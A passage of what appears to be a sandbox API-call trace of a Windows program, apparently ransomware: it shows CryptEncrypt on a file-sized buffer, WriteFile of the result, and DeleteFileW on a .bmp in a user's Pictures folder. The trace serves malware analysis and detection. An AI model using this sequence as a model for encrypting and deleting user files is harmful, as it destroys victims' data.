hHeap=0x2af0000) returned 1 [0208.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0208.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0208.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0208.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0208.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0208.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0208.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0208.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0208.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0208.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0208.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0208.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab350, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0208.766] CryptEncrypt (in: hKey=0x9e1ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x462f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x4630) returned 1 [0208.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.766] CharLowerBuffW (in: lpsz="byte[17968]", cchLength=0xb | out: lpsz="byte[17968]") returned 0xb [0208.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.766] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.766] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.767] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.767] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.767] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.767] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0208.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab2f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0208.767] CryptEncrypt (in: hKey=0x9e1ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2ab2eb0*, pdwDataLen=0x8cef60*=0x462f, dwBufLen=0x4630 | out: pbData=0x2ab2eb0*, pdwDataLen=0x8cef60*=0x4630) returned 1 [0208.768] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.768] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.768] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.768] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.768] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.768] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.768] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.768] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0208.768] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.768] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0208.768] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.768] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.768] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0208.768] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.768] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0208.768] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.768] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.768] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.768] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.768] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.768] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.768] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.768] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.769] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.769] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.769] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.769] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.770] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.770] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.770] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.770] WriteFile (in: hFile=0x510, lpBuffer=0x2a9ef78*, nNumberOfBytesToWrite=0x4630, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a9ef78*, lpNumberOfBytesWritten=0x8cf5e4*=0x4630, lpOverlapped=0x0) returned 1 [0208.772] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.772] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.772] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0208.772] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.772] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0208.772] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.772] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.772] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.772] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0208.772] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.772] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0208.772] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0208.772] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0208.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab128, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0208.772] CryptDestroyKey (hKey=0x9e1ab8) returned 1 [0208.772] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.772] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.773] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0208.773] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.773] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0208.773] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.773] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.773] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0208.773] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.773] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0208.773] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.773] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.773] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.773] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.773] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.773] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0208.773] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.773] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0208.773] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0208.773] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.773] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.773] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.773] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.773] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.773] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0208.774] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.774] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0208.774] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.774] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.774] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0208.774] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.774] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0208.774] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.774] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.774] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.774] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.774] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.774] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.777] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.777] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.777] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.777] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.777] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.777] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.777] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.777] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.777] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.777] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0208.777] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.777] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0208.777] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.777] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.778] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0208.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7120, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0208.778] CryptReleaseContext (hProv=0xa7c088, dwFlags=0x0) returned 1 [0208.778] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.778] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.778] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.778] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.778] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.778] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.778] FreeLibrary (hLibModule=0x76390000) returned 1 [0208.778] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.778] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.778] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.778] CloseHandle (hObject=0x524) returned 1 [0208.779] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.779] CloseHandle (hObject=0x510) returned 1 [0208.781] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.781] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.781] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.781] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.781] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/619JnEBOuc.bmp", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\619JnEBOuc.bmp", lpFilePart=0x8cedf4*="619JnEBOuc.bmp") returned 0x27 [0208.782] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\619JnEBOuc.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\619jnebouc.bmp")) returned 0x20 [0208.782] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\619JnEBOuc.bmp", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x981365d0, ftCreationTime.dwHighDateTime=0x1d5d7dd, ftLastAccessTime.dwLowDateTime=0x1a37ec0, ftLastAccessTime.dwHighDateTime=0x1d5d6be, ftLastWriteTime.dwLowDateTime=0x1a37ec0, ftLastWriteTime.dwHighDateTime=0x1d5d6be, nFileSizeHigh=0x0, nFileSizeLow=0x462f, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="619JnEBOuc.bmp", cAlternateFileName="619JNE~1.BMP")) returned 0x9e1db8 [0208.782] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\619JnEBOuc.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\619jnebouc.bmp")) returned 1 [0208.789] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x981365d0, ftCreationTime.dwHighDateTime=0x1d5d7dd, ftLastAccessTime.dwLowDateTime=0x1a37ec0, ftLastAccessTime.dwHighDateTime=0x1d5d6be, ftLastWriteTime.dwLowDateTime=0x1a37ec0, ftLastWriteTime.dwHighDateTime=0x1d5d6be, nFileSizeHigh=0x0, nFileSizeLow=0x462f, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="619JnEBOuc.bmp", cAlternateFileName="619JNE~1.BMP")) returned 0 [0208.789] FindClose (in: hFindFile=0x9e1db8 | out: hFindFile=0x9e1db8) returned 1 [0208.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0208.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0208.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 